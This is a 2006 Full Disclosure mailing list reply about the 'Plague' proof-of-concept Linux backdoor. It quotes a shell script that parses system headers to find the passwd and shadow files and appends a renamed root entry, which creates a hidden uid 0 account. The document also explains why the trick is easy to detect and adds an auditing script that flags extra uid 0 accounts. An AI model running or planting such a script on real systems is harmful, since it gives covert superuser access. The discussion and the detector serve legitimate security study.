Full Disclosure mailing list archives

Re: Plague Proof of Concept Linux backdoor
From: hijacker () oldum net
Date: Mon, 23 Oct 2006 13:59:58 +0300 (EEST)

Hello Andrew,

I shall completely ignore the e-mails that followed your reply, as they
seem to me completely off the subject and, at the same time, some of
them offensive to me!

Let's go into more details on that backdoor.

I created the file test1.sh containing:

hijacker () hpa:~/hacki$ cat test1.sh
#!/bin/sh
if [ -e /usr/include/paths.h ]

then

        file=`awk 'NR==59 {gsub(/"/,"");print $3}' /usr/include/paths.h`
        sed -n '1p' $file|sed 's/root/plaguePoC/g' >> $file
        file2=`awk 'NR==74 {print $8}' /usr/include/sysexits.h`
        sed -n '1p' $file2|sed 's/root/plaguePoC/g' >> $file2

fi

Then I ran chmod 700 test1.sh, and then I ran:

hijacker () hpa:~/hacki$ ./test1.sh
sed: can't read /etc/shadow: Permission denied
./test1.sh: line 7: /etc/shadow: Permission denied
sed: can't read /etc/passwd,: No such file or directory
./test1.sh: line 9: /etc/passwd,: Permission denied


Are you saying I just injected my system with an account with root access
hiding somewhere? Please, clarify.

Thanks,
-Nikolay Kichukov


On 22 Oct 06, at 04:29, hijacker () oldum net wrote:
even if they have ssh access, there is still nothing they can do, except
to create two files in their $HOME directories containing expressions from
paths.h and sysexits.h ?

Why would that be considered a backdoor?

The awk commands parse out the strings "/etc/passwd" and "/etc/shadow" from
the headers. It's still rather easily detected - most of the rootkit-checking
programs will detect an alternate uid0 account very quickly - but it does
demonstrate an interesting way of avoiding target strings in the binary.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
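The detection Andrew refers to, as an added example that is not part of the thread: a POSIX sh check that walks a passwd-format file and flags any uid 0 entry other than root, any username that appears twice, and any line without the seven passwd fields. The sample passwd data is constructed; its plaguePoC line is what the PoC's sed would append, i.e. line 1 of /etc/passwd with "root" replaced.

```shell
#!/bin/sh
# audit_uid0: read passwd-format lines on stdin, print one finding per line.
# Output format: <reason>:<username>   (nothing printed means nothing found)
audit_uid0() {
    awk -F: '
        NF == 0 { next }                       # ignore blank lines
        NF != 7 { printf "malformed:%s\n", $0; next }   # truncated/garbled entry
        # A uid 0 account that is not root is a second superuser login.
        $3 == 0 && $1 != "root" { printf "extra-uid0:%s\n", $1 }
        # The same username twice is another common tampering artefact
        # (printed once, on the second occurrence).
        seen[$1]++ == 1 { printf "duplicate-user:%s\n", $1 }
    '
}

# Constructed sample. The last-but-one line is the PoC's appended entry:
# line 1 of /etc/passwd after sed "s/root/plaguePoC/g".
SAMPLE_PASSWD=$(cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nikolay:x:1000:1000:Nikolay:/home/nikolay:/bin/bash
plaguePoC:x:0:0:plaguePoC:/plaguePoC:/bin/bash
nikolay:x:1001:1001::/home/nikolay2:/bin/sh
EOF
)

# On a real host run:  audit_uid0 < /etc/passwd
# Note the caveat: this reads the file the attacker could have edited, so a
# rootkit checker also compares against a known-good copy or package database.
printf '%s\n' "$SAMPLE_PASSWD" | audit_uid0
```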